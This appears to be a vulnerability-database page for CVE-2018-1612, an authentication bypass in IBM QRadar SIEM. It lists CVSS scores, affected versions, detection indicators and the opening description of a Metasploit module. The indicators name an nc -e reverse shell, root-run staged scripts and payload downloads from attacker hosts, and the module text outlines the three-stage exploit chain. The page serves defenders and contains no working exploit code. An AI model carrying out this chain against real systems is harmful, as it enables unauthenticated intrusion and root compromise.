CVE-2018-1612
published 2018-07-17CVE-2018-1612: IBM QRadar Incident Forensics (IBM QRadar SIEM 7.2, and 7.3) could allow a remote attacker to bypass authentication and obtain sensitive information. IBM…
PriorityP258medium5.8CVSS 3.0
AVNACLPRNUINSCCLINAN
EXPLOIT
EPSS
56.95%
98.9th percentile
IBM QRadar Incident Forensics (IBM QRadar SIEM 7.2, and 7.3) could allow a remote attacker to bypass authentication and obtain sensitive information. IBM X-Force ID: 144164.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | qradar_security_information_and_event_manager | — | — |
| ibm | qradar_security_information_and_event_manager | — | — |
| ibm | qradar_security_information_and_event_manager | — | — |
| ibm | qradar_security_information_and_event_manager | 7.2.0 – 7.2.8 | — |
| ibm | qradar_siem | — | — |
| ibm | qradar_siem | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Alert on GET requests to /ForensicsAnalysisServlet/ returning HTTP 403 — the module uses this as a fingerprint to confirm the vulnerable endpoint is present. ↗
- →Monitor for new or modified files written under /store/configservices/staging/updates/ by the 'nobody' user — this is where the attacker-controlled shell script is staged for root execution. ↗
- →Detect outbound HTTP/HTTPS connections from the QRadar host to attacker-controlled infrastructure on non-standard port 4448, used to download the privilege escalation payload. ↗
- →Alert on execution of /usr/bin/nc with the -e flag spawned from a QRadar process context — this is the reverse shell command dropped and executed as part of the exploit chain. ↗
- →The exploit chain requires three CVEs chained together (CVE-2016-9722, CVE-2018-1418, CVE-2018-1612); correlate all three in SIEM alerts for high-confidence detection of this specific attack. ↗
- ·The Forensics web application is disabled in QRadar Community Edition but the vulnerable code is still present and reachable, meaning all QRadar flavours are exploitable regardless of whether Forensics is enabled. ↗
- ·Confirmed vulnerable versions span IBM QRadar SIEM up to 7.2.8 patch 12 and 7.3.1 patch 3; detections should cover both 7.2 and 7.3 branches. ↗
- ·The exploit's final privilege escalation stage relies on a QRadar scheduled task executing the attacker's script as root; the delay between initial compromise and root execution can be up to ~80 seconds, which may affect timing-based detections. ↗
CVSS provenance
nvdv3.05.8MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IBM QRadar SIEM - Remote Code Execution (Metasploit)
exploitdb·2018-07-11
CVE-2018-1612 IBM QRadar SIEM - Remote Code Execution (Metasploit)
IBM QRadar SIEM - Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'securerandom'
class MetasploitModule 'IBM QRadar SIEM Unauthenticated Remote Code Execution',
'Description' => %q{
IBM QRadar SIEM has three vulnerabilities in the Forensics web application
that when chained together allow an attacker to achieve unauthenticated remote code execution.
The first stage bypasses authentication by fixating session cookies.
The second stage uses those authenticated sessions cookies to write a file to disk and execute
that file as the "nobody" user.
The third and final stage occurs when the file executed as "nobody" writes an entry into the
database that cau
Metasploit
IBM QRadar SIEM Unauthenticated Remote Code Execution
metasploit
IBM QRadar SIEM Unauthenticated Remote Code Execution
IBM QRadar SIEM Unauthenticated Remote Code Execution
IBM QRadar SIEM has three vulnerabilities in the Forensics web application that when chained together allow an attacker to achieve unauthenticated remote code execution. The first stage bypasses authentication by fixating session cookies. The second stage uses those authenticated sessions cookies to write a file to disk and execute that file as the "nobody" user. The third and final stage occurs when the file executed as "nobody" writes an entry into the database that causes QRadar to execute a shell script controlled by the attacker as root within the next minute. Details about these vulnerabilities can be found in the advisories listed in References. The Forensics web application is disabled in QRadar Community Edition, but the code
No writeups or analysis indexed.
http://www-01.ibm.com/support/docview.wss?uid=swg22017062https://exchange.xforce.ibmcloud.com/vulnerabilities/144164https://www.exploit-db.com/exploits/45005/http://www-01.ibm.com/support/docview.wss?uid=swg22017062https://exchange.xforce.ibmcloud.com/vulnerabilities/144164https://www.exploit-db.com/exploits/45005/
2018-07-17
Published